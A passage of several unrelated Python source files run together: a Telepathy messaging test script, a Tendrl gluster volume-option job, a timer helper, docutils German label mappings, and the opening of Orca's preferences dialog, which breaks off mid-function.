				'forward':  self._forward,
			},
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, busName, objectPath):
		# Remember the bus name so later actions can open channels on it.
		self._serviceName = busName
		self._conn = telepathy.client.Connection(busName, objectPath)
		super(RequestConnection, self)._on_done()


class Connect(Action):
	"""Connects the requested connection and waits for the CONNECTED status."""

	def __init__(self, connAction):
		super(Connect, self).__init__()
		self._connAction = connAction

	def queue_action(self):
		# Watch status changes so we only advance the chain once connected.
		self._connAction.conn[telepathy.server.CONNECTION].connect_to_signal(
			'StatusChanged',
			self._on_change,
		)
		self._connAction.conn[telepathy.server.CONNECTION].Connect(
			reply_handler = self._on_generic_message,
			error_handler = self._on_error,
		)

	def _on_done(self):
		super(Connect, self)._on_done()

	def _on_change(self, status, reason):
		if status == telepathy.constants.CONNECTION_STATUS_DISCONNECTED:
			print "Disconnected!"
			# NOTE(review): Connect never defines self._conn elsewhere;
			# presumably this was meant to clear the connection action's
			# conn attribute — confirm against the original intent.
			self._conn = None
		elif status == telepathy.constants.CONNECTION_STATUS_CONNECTED:
			print "Connected"
			self._on_done()
		elif status == telepathy.constants.CONNECTION_STATUS_CONNECTING:
			print "Connecting"
		else:
			print "Status: %r" % status


class SimplePresenceOptions(Action):
	"""Fetches and prints the presence statuses the connection supports."""

	def __init__(self, connAction):
		super(SimplePresenceOptions, self).__init__()
		self._connAction = connAction

	def queue_action(self):
		self._connAction.conn[DBUS_PROPERTIES].Get(
			telepathy.server.CONNECTION_INTERFACE_SIMPLE_PRESENCE,
			'Statuses',
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, statuses):
		print "\tAvailable Statuses"
		for (key, value) in statuses.iteritems():
			print "\t\t - %s" % key
		super(SimplePresenceOptions, self)._on_done()


class NullHandle(object):
	"""Stand-in handle used when no real contact handle is wanted.

	Exposes the same handle/handles interface as the handle actions,
	but always yields the null handle (0) and no handle list.
	"""

	@property
	def handle(self):
		return 0

	@property
	def handles(self):
		return []


class UserHandle(Action):
	"""Fetches the connection's own (self) handle."""

	def __init__(self, connAction):
		super(UserHandle, self).__init__()
		self._connAction = connAction
		self._handle = None

	@property
	def handle(self):
		return self._handle

	@property
	def handles(self):
		return [self._handle]

	def queue_action(self):
		conn = self._connAction.conn
		conn[telepathy.server.CONNECTION].GetSelfHandle(
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, handle):
		self._handle = handle
		super(UserHandle, self)._on_done()


class RequestHandle(Action):
	"""Resolves a list of names to Telepathy handles of a given type."""

	def __init__(self, connAction, handleType, handleNames):
		super(RequestHandle, self).__init__()
		self._connAction = connAction
		self._handle = None
		self._handleType = handleType
		self._handleNames = handleNames

	@property
	def handle(self):
		return self._handle

	@property
	def handles(self):
		return [self._handle]

	def queue_action(self):
		conn = self._connAction.conn
		conn[telepathy.server.CONNECTION].RequestHandles(
			self._handleType,
			self._handleNames,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, handles):
		# Only the first resolved handle is retained.
		self._handle = handles[0]
		super(RequestHandle, self)._on_done()


class RequestChannel(Action):
	"""Opens a channel of the given type to a previously resolved handle."""

	def __init__(self, connAction, handleAction, channelType, handleType):
		super(RequestChannel, self).__init__()
		self._connAction = connAction
		self._handleAction = handleAction
		self._channel = None
		self._channelType = channelType
		self._handleType = handleType

	@property
	def channel(self):
		return self._channel

	def queue_action(self):
		conn = self._connAction.conn
		conn[telepathy.server.CONNECTION].RequestChannel(
			self._channelType,
			self._handleType,
			self._handleAction.handle,
			True,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, channelObjectPath):
		self._channel = telepathy.client.Channel(self._connAction.serviceName, channelObjectPath)
		super(RequestChannel, self)._on_done()


class EnsureChannel(Action):
	"""Ensures a channel to a target ID exists, creating it if necessary."""

	def __init__(self, connAction, channelType, handleType, handleId):
		super(EnsureChannel, self).__init__()
		self._connAction = connAction
		self._channel = None
		self._channelType = channelType
		self._handleType = handleType
		self._handleId = handleId
		self._handle = None

	@property
	def channel(self):
		return self._channel

	@property
	def handle(self):
		return self._handle

	@property
	def handles(self):
		return [self._handle]

	def queue_action(self):
		# Request by target ID; the resolved handle comes back in the
		# returned channel properties.
		properties = {
			telepathy.server.CHANNEL_INTERFACE+".ChannelType": self._channelType,
			telepathy.server.CHANNEL_INTERFACE+".TargetHandleType": self._handleType,
			telepathy.server.CHANNEL_INTERFACE+".TargetID": self._handleId,
		}
		self._connAction.conn[telepathy.server.CONNECTION_INTERFACE_REQUESTS].EnsureChannel(
			properties,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, yours, channelObjectPath, properties):
		print "Create?", not not yours
		print "Path:", channelObjectPath
		print "Properties:", properties
		self._channel = telepathy.client.Channel(self._connAction.serviceName, channelObjectPath)
		self._handle = properties[telepathy.server.CHANNEL_INTERFACE+".TargetHandle"]
		super(EnsureChannel, self)._on_done()


class CloseChannel(Action):
	"""Closes the channel produced by a previous channel action."""

	def __init__(self, connAction, chanAction):
		super(CloseChannel, self).__init__()
		self._connAction = connAction
		self._chanAction = chanAction
		self._handles = []

	def queue_action(self):
		channel = self._chanAction.channel
		channel[telepathy.server.CHANNEL].Close(
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self):
		super(CloseChannel, self)._on_done()


class ContactHandles(Action):
	"""Reads the member handles of a group channel."""

	def __init__(self, connAction, chanAction):
		super(ContactHandles, self).__init__()
		self._connAction = connAction
		self._chanAction = chanAction
		self._handles = []

	@property
	def handles(self):
		return self._handles

	def queue_action(self):
		channel = self._chanAction.channel
		channel[DBUS_PROPERTIES].Get(
			telepathy.server.CHANNEL_INTERFACE_GROUP,
			'Members',
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, handles):
		self._handles = list(handles)
		super(ContactHandles, self)._on_done()


class SimplePresenceStatus(Action):
	"""Fetches and prints the presences of the given handles."""

	def __init__(self, connAction, handleAction):
		super(SimplePresenceStatus, self).__init__()
		self._connAction = connAction
		self._handleAction = handleAction

	def queue_action(self):
		self._connAction.conn[telepathy.server.CONNECTION_INTERFACE_SIMPLE_PRESENCE].GetPresences(
			self._handleAction.handles,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, aliases):
		print "\tPresences:"
		for hid, (presenceType, presence, presenceMessage) in aliases.iteritems():
			print "\t\t%s:" % hid, presenceType, presence, presenceMessage
		super(SimplePresenceStatus, self)._on_done()


class SetSimplePresence(Action):
	"""Publishes a new presence status and message on the connection."""

	def __init__(self, connAction, status, message):
		super(SetSimplePresence, self).__init__()
		self._connAction = connAction
		self._status = status
		self._message = message

	def queue_action(self):
		conn = self._connAction.conn
		conn[telepathy.server.CONNECTION_INTERFACE_SIMPLE_PRESENCE].SetPresence(
			self._status,
			self._message,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self):
		super(SetSimplePresence, self)._on_done()


class Aliases(Action):
	"""Fetches and prints the aliases for the given handles."""

	def __init__(self, connAction, handleAction):
		super(Aliases, self).__init__()
		self._connAction = connAction
		self._handleAction = handleAction

	def queue_action(self):
		self._connAction.conn[telepathy.server.CONNECTION_INTERFACE_ALIASING].RequestAliases(
			self._handleAction.handles,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, aliases):
		print "\tAliases:"
		# Aliases are returned in the same order as the requested handles.
		for h, alias in zip(self._handleAction.handles, aliases):
			print "\t\t", h, alias
		super(Aliases, self)._on_done()


class Call(Action):
	"""Starts an audio stream (a call) on a streamed-media channel."""

	def __init__(self, connAction, chanAction, handleAction):
		super(Call, self).__init__()
		self._connAction = connAction
		self._chanAction = chanAction
		self._handleAction = handleAction

	def queue_action(self):
		self._chanAction.channel[telepathy.server.CHANNEL_TYPE_STREAMED_MEDIA].RequestStreams(
			self._handleAction.handle,
			[telepathy.constants.MEDIA_STREAM_TYPE_AUDIO],
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, handle):
		print "Call started"
		super(Call, self)._on_done()


class SendText(Action):
	"""Sends a text message over a text channel."""

	def __init__(self, connAction, chanAction, handleAction, messageType, message):
		super(SendText, self).__init__()
		self._connAction = connAction
		self._chanAction = chanAction
		self._handleAction = handleAction
		self._messageType = messageType
		self._message = message

	def queue_action(self):
		self._chanAction.channel[telepathy.server.CHANNEL_TYPE_TEXT].Send(
			self._messageType,
			self._message,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self,):
		print "Message sent"
		super(SendText, self)._on_done()


class Sleep(Action):
	"""Waits *length* milliseconds before completing."""

	def __init__(self, length):
		super(Sleep, self).__init__()
		self._length = length

	def queue_action(self):
		# timeout_add fires _on_done once after the delay elapses.
		gobject.timeout_add(self._length, self._on_done)


class Block(Action):
	"""Deliberately stalls the chain: prints a notice and never completes."""

	def __init__(self):
		super(Block, self).__init__()

	def queue_action(self):
		print "Blocking"

	def _on_done(self):
		# Intentionally does not advance the chain.
		#super(SendText, self)._on_done()
		pass


class Disconnect(Action):
	"""Disconnects the connection held by the given connection action."""

	def __init__(self, connAction):
		super(Disconnect, self).__init__()
		self._connAction = connAction

	def queue_action(self):
		conn = self._connAction.conn
		conn[telepathy.server.CONNECTION].Disconnect(
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)


if __name__ == '__main__':
	# Build a chain of Actions; each action triggers the next from its
	# _on_done callback, and the GLib main loop drives the whole sequence.
	loop = gobject.MainLoop()

	reg = get_registry()
	cm = get_connection_manager(reg)

	nullHandle = NullHandle()

	dummy = DummyAction()
	firstAction = dummy
	lastAction = dummy

	if True:
		dp = DisplayParams(cm)
		lastAction.append_action(dp)
		lastAction = lastAction.get_next_action()

	if True:
		# Credentials and forwarding number come from the command line.
		username = sys.argv[1]
		password = sys.argv[2]
		forward = sys.argv[3]
		reqcon = RequestConnection(cm, username, password, forward)
		lastAction.append_action(reqcon)
		lastAction = lastAction.get_next_action()

		if False:
			reqcon = RequestConnection(cm, username, password, forward)
			lastAction.append_action(reqcon)
			lastAction = lastAction.get_next_action()

		con = Connect(reqcon)
		lastAction.append_action(con)
		lastAction = lastAction.get_next_action()

		if True:
			spo = SimplePresenceOptions(reqcon)
			lastAction.append_action(spo)
			lastAction = lastAction.get_next_action()

		if True:
			uh = UserHandle(reqcon)
			lastAction.append_action(uh)
			lastAction = lastAction.get_next_action()

			ua = Aliases(reqcon, uh)
			lastAction.append_action(ua)
			lastAction = lastAction.get_next_action()

			sps = SimplePresenceStatus(reqcon, uh)
			lastAction.append_action(sps)
			lastAction = lastAction.get_next_action()

			if False:
				setdnd = SetSimplePresence(reqcon, "dnd", "")
				lastAction.append_action(setdnd)
				lastAction = lastAction.get_next_action()

				sps = SimplePresenceStatus(reqcon, uh)
				lastAction.append_action(sps)
				lastAction = lastAction.get_next_action()

				setdnd = SetSimplePresence(reqcon, "available", "")
				lastAction.append_action(setdnd)
				lastAction = lastAction.get_next_action()

				sps = SimplePresenceStatus(reqcon, uh)
				lastAction.append_action(sps)
				lastAction = lastAction.get_next_action()

		if False:
			sl = Sleep(10 * 1000)
			lastAction.append_action(sl)
			lastAction = lastAction.get_next_action()

		if False:
			rclh = RequestHandle(reqcon, telepathy.HANDLE_TYPE_LIST, ["subscribe"])
			lastAction.append_action(rclh)
			lastAction = lastAction.get_next_action()

			rclc = RequestChannel(
				reqcon,
				rclh,
				telepathy.CHANNEL_TYPE_CONTACT_LIST,
				telepathy.HANDLE_TYPE_LIST,
			)
			lastAction.append_action(rclc)
			lastAction = lastAction.get_next_action()

			ch = ContactHandles(reqcon, rclc)
			lastAction.append_action(ch)
			lastAction = lastAction.get_next_action()

			ca = Aliases(reqcon, ch)
			lastAction.append_action(ca)
			lastAction = lastAction.get_next_action()

		if True:
			# Open (or reuse) a text channel to the account given as argv[4]
			# and send a test message on it.
			accountNumber = sys.argv[4]
			enChan = EnsureChannel(reqcon, telepathy.CHANNEL_TYPE_TEXT, telepathy.HANDLE_TYPE_CONTACT, accountNumber)
			lastAction.append_action(enChan)
			lastAction = lastAction.get_next_action()

			sendDebugtext = SendText(reqcon, enChan, enChan, telepathy.CHANNEL_TEXT_MESSAGE_TYPE_NORMAL, "Boo!")
			lastAction.append_action(sendDebugtext)
			lastAction = lastAction.get_next_action()

		if False:
			rch = RequestHandle(reqcon, telepathy.HANDLE_TYPE_CONTACT, ["18005558355"]) #(1-800-555-TELL)
			lastAction.append_action(rch)
			lastAction = lastAction.get_next_action()

			# making a phone call
			if True:
				smHandle = rch
				smHandleType = telepathy.HANDLE_TYPE_CONTACT
			else:
				smHandle = nullHandle
				smHandleType = telepathy.HANDLE_TYPE_NONE
			rsmc = RequestChannel(
				reqcon,
				smHandle,
				telepathy.CHANNEL_TYPE_STREAMED_MEDIA,
				smHandleType,
			)
			lastAction.append_action(rsmc)
			lastAction = lastAction.get_next_action()

			if False:
				call = Call(reqcon, rsmc, rch)
				lastAction.append_action(call)
				lastAction = lastAction.get_next_action()

			# sending a text
			rtc = RequestChannel(
				reqcon,
				rch,
				telepathy.CHANNEL_TYPE_TEXT,
				smHandleType,
			)
			lastAction.append_action(rtc)
			lastAction = lastAction.get_next_action()

			if True:
				closechan = CloseChannel(reqcon, rtc)
				lastAction.append_action(closechan)
				lastAction = lastAction.get_next_action()

				rtc = RequestChannel(
					reqcon,
					rch,
					telepathy.CHANNEL_TYPE_TEXT,
					smHandleType,
				)
				lastAction.append_action(rtc)
				lastAction = lastAction.get_next_action()

			if False:
				sendtext = SendText(reqcon, rtc, rch, telepathy.CHANNEL_TEXT_MESSAGE_TYPE_NORMAL, "Boo!")
				lastAction.append_action(sendtext)
				lastAction = lastAction.get_next_action()

		if False:
			bl = Block()
			lastAction.append_action(bl)
			lastAction = lastAction.get_next_action()

		if False:
			sl = Sleep(30 * 1000)
			lastAction.append_action(sl)
			lastAction = lastAction.get_next_action()

		dis = Disconnect(reqcon)
		lastAction.append_action(dis)
		lastAction = lastAction.get_next_action()

	quitter = QuitLoop(loop)
	lastAction.append_action(quitter)
	lastAction = lastAction.get_next_action()

	# Kick off the chain and run the main loop until QuitLoop stops it.
	firstAction.queue_action()
	loop.run()

import json

import etcd
from tendrl.gluster_bridge.atoms.volume.set import Set


class SetVolumeOption(object):
    """Job handler that applies a single gluster volume option via the
    imported Set atom and records the finished job back into etcd."""

    def __init__(self, api_job):
        super(SetVolumeOption, self).__init__()
        self.api_job = api_job
        # BUG FIX: this previously pointed at SetVolumeOption itself, so
        # self.atom() in start() would re-enter this wrapper (and fail,
        # since the required api_job argument would be missing). The
        # imported — and otherwise unused — Set atom is what actually
        # performs the volume-option change.
        self.atom = Set

    def start(self):
        """Decode the job attributes, run the Set atom, then mark the job
        finished and write it back under its request id."""
        attributes = json.loads(self.api_job['attributes'].decode('utf-8'))
        vol_name = attributes['volname']
        option = attributes['option_name']
        option_value = attributes['option_value']
        self.atom().start(vol_name, option, option_value)
        self.api_job['status'] = "finished"
        etcd.Client().write(self.api_job['request_id'],
                            json.dumps(self.api_job))

import sys
import time


# Re-export the blocking sleep before the name ``time`` is rebound below.
sleep = time.sleep

if sys.platform == 'win32':
    # time.clock was the high-resolution timer on Windows, but it was
    # removed in Python 3.8; prefer its replacement when available and
    # fall back to clock on older interpreters.
    time = getattr(time, 'perf_counter', None) or time.clock
else:
    time = time.time



# Authors:   David Goodger; Gunnar Schwant
# Contact:   goodger@users.sourceforge.net
# Revision:  $Revision: 21817 $
# Date:      $Date: 2005-07-21 13:39:57 -0700 (Thu, 21 Jul 2005) $
# Copyright: This module has been placed in the public domain.

# New language mappings are welcome.  Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>.  Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.

"""
German language mappings for language-dependent features of Docutils.
"""

__docformat__ = 'reStructuredText'

# Node class name -> German label text used when rendering documents.
labels = {
    'author': 'Autor',
    'authors': 'Autoren',
    'organization': 'Organisation',
    'address': 'Adresse',
    'contact': 'Kontakt',
    'version': 'Version',
    'revision': 'Revision',
    'status': 'Status',
    'date': 'Datum',
    'dedication': 'Widmung',
    'copyright': 'Copyright',
    'abstract': 'Zusammenfassung',
    'attention': 'Achtung!',
    'caution': 'Vorsicht!',
    'danger': '!GEFAHR!',
    'error': 'Fehler',
    'hint': 'Hinweis',
    'important': 'Wichtig',
    'note': 'Bemerkung',
    'tip': 'Tipp',
    'warning': 'Warnung',
    'contents': 'Inhalt'}
"""Mapping of node class name to label text."""

# German (lowercased) field name -> canonical English field name.
bibliographic_fields = {
    'autor': 'author',
    'autoren': 'authors',
    'organisation': 'organization',
    'adresse': 'address',
    'kontakt': 'contact',
    'version': 'version',
    'revision': 'revision',
    'status': 'status',
    'datum': 'date',
    'copyright': 'copyright',
    'widmung': 'dedication',
    'zusammenfassung': 'abstract'}
"""German (lowcased) to canonical name mapping for bibliographic fields."""

author_separators = [';', ',']
"""List of separator strings for the 'Authors' bibliographic field. Tried in
order."""

# Orca
#
# Copyright 2005-2009 Sun Microsystems Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA  02110-1301 USA.

"""Displays a GUI for the user to set Orca preferences."""

__id__        = "$Id$"
__version__   = "$Revision$"
__date__      = "$Date$"
__copyright__ = "Copyright (c) 2005-2009 Sun Microsystems Inc."
__license__   = "LGPL"

import os
from gi.repository import Gdk
from gi.repository import GLib
from gi.repository import Gtk
from gi.repository import GObject
from gi.repository import Pango
import pyatspi
import time

from . import acss
from . import debug
from . import guilabels
from . import messages
from . import orca
from . import orca_gtkbuilder
from . import orca_gui_profile
from . import orca_state
from . import orca_platform
from . import settings
from . import settings_manager
from . import input_event
from . import keybindings
from . import pronunciation_dict
from . import braille
from . import speech
from . import speechserver
from . import text_attribute_names

# Shared settings-manager instance used throughout this module.
_settingsManager = settings_manager.getManager()

# liblouis (braille contraction support) is optional: treat it as
# unavailable if the Python bindings are missing or if no translation
# tables were installed alongside Orca.
try:
    import louis
except ImportError:
    louis = None
from .orca_platform import tablesdir
if louis and not tablesdir:
    louis = None

# Column indices for the key-bindings tree model.  Tuple unpacking works
# directly on range(); the list() wrappers (a 2to3 artifact) were unnecessary.
(HANDLER, DESCRIP, MOD_MASK1, MOD_USED1, KEY1, CLICK_COUNT1, OLDTEXT1,
 TEXT1, MODIF, EDITABLE) = range(10)

# Column indices for the text-attributes tree model.
(NAME, IS_SPOKEN, IS_BRAILLED, VALUE) = range(4)

# Column indices for the pronunciation-dictionary tree model.
(ACTUAL, REPLACEMENT) = range(2)

# Must match the order of voice types in the GtkBuilder file.
#
(DEFAULT, UPPERCASE, HYPERLINK, SYSTEM) = range(4)

# Must match the order that the timeFormatCombo is populated.
#
(TIME_FORMAT_LOCALE, TIME_FORMAT_12_HM, TIME_FORMAT_12_HMS, TIME_FORMAT_24_HMS,
 TIME_FORMAT_24_HMS_WITH_WORDS, TIME_FORMAT_24_HM,
 TIME_FORMAT_24_HM_WITH_WORDS) = range(7)

# Must match the order that the dateFormatCombo is populated.
#
(DATE_FORMAT_LOCALE, DATE_FORMAT_NUMBERS_DM, DATE_FORMAT_NUMBERS_MD,
 DATE_FORMAT_NUMBERS_DMY, DATE_FORMAT_NUMBERS_MDY, DATE_FORMAT_NUMBERS_YMD,
 DATE_FORMAT_FULL_DM, DATE_FORMAT_FULL_MD, DATE_FORMAT_FULL_DMY,
 DATE_FORMAT_FULL_MDY, DATE_FORMAT_FULL_YMD, DATE_FORMAT_ABBREVIATED_DM,
 DATE_FORMAT_ABBREVIATED_MD, DATE_FORMAT_ABBREVIATED_DMY,
 DATE_FORMAT_ABBREVIATED_MDY, DATE_FORMAT_ABBREVIATED_YMD) = range(16)

class OrcaSetupGUI(orca_gtkbuilder.GtkBuilderWrapper):

    def __init__(self, fileName, windowName, prefsDict):
        """Initialize the Orca configuration GUI.

        Arguments:
        - fileName: name of the GtkBuilder file.
        - windowName: name of the component to get from the GtkBuilder file.
        - prefsDict: dictionary of preferences to use during initialization
        """

        orca_gtkbuilder.GtkBuilderWrapper.__init__(self, fileName, windowName)
        self.prefsDict = prefsDict

        self._defaultProfile = ['Default', 'default']

        # Pre-declare every attribute assigned later so static checkers
        # (pylint) see them defined in the constructor.
        self.bbindings = self.kbindings = None
        self.cellRendererText = self.planeCellRendererText = None
        self.defaultVoice = self.uppercaseVoice = None
        self.hyperlinkVoice = self.systemVoice = None
        self.disableKeyGrabPref = None
        self.getTextAttributesView = None
        self.initializingSpeech = None
        self.keyBindingsModel = self.keyBindView = None
        self.newBinding = self.pendingKeyBindings = None
        self.pronunciationModel = self.pronunciationView = None
        self.screenHeight = self.screenWidth = None
        self.speechFamiliesChoice = self.speechFamiliesChoices = None
        self.speechFamiliesModel = None
        self.speechLanguagesChoice = self.speechLanguagesChoices = None
        self.speechLanguagesModel = None
        self.speechServersChoice = self.speechServersChoices = None
        self.speechServersModel = None
        self.speechSystemsChoice = self.speechSystemsChoices = None
        self.speechSystemsModel = None
        self.window = None
        self.workingFactories = None
        self.savedGain = self.savedPitch = self.savedRate = None
        self.profilesCombo = self.profilesComboModel = None
        self.startingProfileCombo = None
        self.script = None

        # Mutable state with non-None initial values.
        self.speechFamilies = []
        self._capturedKey = []
        self._isInitialSetup = False
        self.selectedFamilyChoices = {}
        self.selectedLanguageChoices = {}

    def init(self, script):
        """Initialize the Orca configuration GUI. Read the user's current
        set of preferences and set the GUI state to match. Setup speech
        support and populate the combo box lists on the Speech Tab pane
        accordingly.

        Arguments:
        - script: the active script whose preferences are being edited
        """

        self.script = script

        # Restore the default rate/pitch/gain,
        # in case the user played with the sliders.
        # Missing settings fall back to stock defaults
        # (gain 10, pitch 5, rate 50).
        try:
            voices = _settingsManager.getSetting('voices')
            defaultVoice = voices[settings.DEFAULT_VOICE]
        except KeyError:
            defaultVoice = {}
        try:
            self.savedGain = defaultVoice[acss.ACSS.GAIN]
        except KeyError:
            self.savedGain = 10.0
        try:
            self.savedPitch = defaultVoice[acss.ACSS.AVERAGE_PITCH]
        except KeyError:
            self.savedPitch = 5.0
        try:
            self.savedRate = defaultVoice[acss.ACSS.RATE]
        except KeyError:
            self.savedRate = 50.0

        # ***** Key Bindings treeview initialization *****

        self.keyBindView = self.get_widget("keyBindingsTreeview")

        # Drop columns left over from a previous init() call so they are
        # not duplicated when appended again below.
        if self.keyBindView.get_columns():
            for column in self.keyBindView.get_columns():
                self.keyBindView.remove_column(column)

        # Store layout must match the HANDLER..EDITABLE module constants.
        self.keyBindingsModel = Gtk.TreeStore(
            GObject.TYPE_STRING,  # Handler name
            GObject.TYPE_STRING,  # Human Readable Description
            GObject.TYPE_STRING,  # Modifier mask 1
            GObject.TYPE_STRING,  # Used Modifiers 1
            GObject.TYPE_STRING,  # Modifier key name 1
            GObject.TYPE_STRING,  # Click count 1
            GObject.TYPE_STRING,  # Original Text of the Key Binding Shown 1
            GObject.TYPE_STRING,  # Text of the Key Binding Shown 1
            GObject.TYPE_BOOLEAN, # Key Modified by User
            GObject.TYPE_BOOLEAN) # Row with fields editable or not

        # Renderer for the hidden (non-ellipsized) columns.
        self.planeCellRendererText = Gtk.CellRendererText()

        # Renderer for visible text; ellipsize so long descriptions fit.
        self.cellRendererText = Gtk.CellRendererText()
        self.cellRendererText.set_property("ellipsize", Pango.EllipsizeMode.END)

        # HANDLER - invisible column
        #
        column = Gtk.TreeViewColumn("Handler",
                                    self.planeCellRendererText,
                                    text=HANDLER)
        column.set_resizable(True)
        column.set_visible(False)
        column.set_sort_column_id(HANDLER)
        self.keyBindView.append_column(column)

        # DESCRIP
        #
        column = Gtk.TreeViewColumn(guilabels.KB_HEADER_FUNCTION,
                                    self.cellRendererText,
                                    text=DESCRIP)
        column.set_resizable(True)
        column.set_min_width(380)
        column.set_sort_column_id(DESCRIP)
        self.keyBindView.append_column(column)

        # MOD_MASK1 - invisible column
        #
        column = Gtk.TreeViewColumn("Mod.Mask 1",
                                    self.planeCellRendererText,
                                    text=MOD_MASK1)
        column.set_visible(False)
        column.set_resizable(True)
        column.set_sort_column_id(MOD_MASK1)
        self.keyBindView.append_column(column)

        # MOD_USED1 - invisible column
        #
        column = Gtk.TreeViewColumn("Use Mod.1",
                                    self.planeCellRendererText,
                                    text=MOD_USED1)
        column.set_visible(False)
        column.set_resizable(True)
        column.set_sort_column_id(MOD_USED1)
        self.keyBindView.append_column(column)

        # KEY1 - invisible column
        #
        column = Gtk.TreeViewColumn("Key1",
                                    self.planeCellRendererText,
                                    text=KEY1)
        column.set_resizable(True)
        column.set_visible(False)
        column.set_sort_column_id(KEY1)
        self.keyBindView.append_column(column)

        # CLICK_COUNT1 - invisible column
        #
        column = Gtk.TreeViewColumn("ClickCount1",
                                    self.planeCellRendererText,
                                    text=CLICK_COUNT1)
        column.set_resizable(True)
        column.set_visible(False)
        column.set_sort_column_id(CLICK_COUNT1)
        self.keyBindView.append_column(column)

        # OLDTEXT1 - invisible column which will store a copy of the
        # original keybinding in TEXT1 prior to the Apply or OK
        # buttons being pressed.  This will prevent automatic
        # resorting each time a cell is edited.
        #
        column = Gtk.TreeViewColumn("OldText1",
                                    self.planeCellRendererText,
                                    text=OLDTEXT1)
        column.set_resizable(True)
        column.set_visible(False)
        column.set_sort_column_id(OLDTEXT1)
        self.keyBindView.append_column(column)

        # TEXT1 - the user-editable key binding text.
        #
        rendererText = Gtk.CellRendererText()
        rendererText.connect("editing-started",
                             self.editingKey,
                             self.keyBindingsModel)
        rendererText.connect("editing-canceled",
                             self.editingCanceledKey)
        rendererText.connect('edited',
                             self.editedKey,
                             self.keyBindingsModel,
                             MOD_MASK1, MOD_USED1, KEY1, CLICK_COUNT1, TEXT1)

        column = Gtk.TreeViewColumn(guilabels.KB_HEADER_KEY_BINDING,
                                    rendererText,
                                    text=TEXT1,
                                    editable=EDITABLE)

        # Sort on OLDTEXT1 so in-progress edits do not reorder rows.
        column.set_resizable(True)
        column.set_sort_column_id(OLDTEXT1)
        self.keyBindView.append_column(column)

        # MODIF - toggle showing whether the user changed the binding.
        #
        rendererToggle = Gtk.CellRendererToggle()
        rendererToggle.connect('toggled',
                               self.keyModifiedToggle,
                               self.keyBindingsModel,
                               MODIF)
        column = Gtk.TreeViewColumn(guilabels.KB_MODIFIED,
                                    rendererToggle,
                                    active=MODIF,
                                    activatable=EDITABLE)
        #column.set_visible(False)
        column.set_resizable(True)
        column.set_sort_column_id(MODIF)
        self.keyBindView.append_column(column)

        # EDITABLE - invisible column
        #
        rendererToggle = Gtk.CellRendererToggle()
        rendererToggle.set_property('activatable', False)
        column = Gtk.TreeViewColumn("Modified",
                                    rendererToggle,
                                    active=EDITABLE)
        column.set_visible(False)
        column.set_resizable(True)
        column.set_sort_column_id(EDITABLE)
        self.keyBindView.append_column(column)

        # Populates the treeview with all the keybindings:
        #
        self._populateKeyBindings()

        self.window = self.get_widget("orcaSetupWindow")

        self._setKeyEchoItems()

        # The speech combo boxes cascade: systems -> servers -> languages
        # -> families; _initSpeechState() fills them in.
        self.speechSystemsModel  = \
                        self._initComboBox(self.get_widget("speechSystems"))
        self.speechServersModel  = \
                        self._initComboBox(self.get_widget("speechServers"))
        self.speechLanguagesModel = \
                        self._initComboBox(self.get_widget("speechLanguages"))
        self.speechFamiliesModel = \
                        self._initComboBox(self.get_widget("speechFamilies"))
        self._initSpeechState()

        # TODO - JD: Will this ever be the case??
        self._isInitialSetup = \
            not os.path.exists(_settingsManager.getPrefsDir())

        # Give the active script a chance to add its own preferences page.
        appPage = self.script.getAppPreferencesGUI()
        if appPage:
            label = Gtk.Label(label=self.script.app.name)
            self.get_widget("notebook").append_page(appPage, label)

        self._initGUIState()

    def _getACSSForVoiceType(self, voiceType):
        """Return the ACSS (voice dictionary) for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM

        Returns the voice dictionary for the given voice type; unknown
        types fall back to the default voice.
        """

        typeToVoice = {
            DEFAULT: self.defaultVoice,
            UPPERCASE: self.uppercaseVoice,
            HYPERLINK: self.hyperlinkVoice,
            SYSTEM: self.systemVoice,
        }
        return typeToVoice.get(voiceType, self.defaultVoice)

    def writeUserPreferences(self):
        """Persist the user's generic Orca preferences, pronunciations and
        key bindings via the settings manager.
        """

        pronunciations = self.getModelDict(self.pronunciationModel)
        keyBindings = self.getKeyBindingsModelDict(self.keyBindingsModel)
        self.prefsDict.update(self.script.getPreferencesFromGUI())
        _settingsManager.saveSettings(
            self.script, self.prefsDict, pronunciations, keyBindings)

    def _getKeyValueForVoiceType(self, voiceType, key, useDefault=True):
        """Look for the value of the given key in the voice dictionary
           for the given voice type.

        Arguments:
        - voiceType: one of DEFAULT, UPPERCASE, HYPERLINK, SYSTEM
        - key: the key to look for in the voice dictionary.
        - useDefault: if True, and the key isn't found for the given voice
                      type, then look for it in the default voice dictionary
                      as well.

        Returns the value of the given key, or None if it's not set.
        """

        # The original triplicated the fallback logic for UPPERCASE,
        # HYPERLINK and SYSTEM; resolve the voice once and share it.
        voice = self._getACSSForVoiceType(voiceType)

        # Non-default voices optionally fall back to the default voice
        # when the key is missing.
        if key not in voice and voice is not self.defaultVoice:
            if not useDefault:
                return None
            voice = self.defaultVoice

        if key in voice:
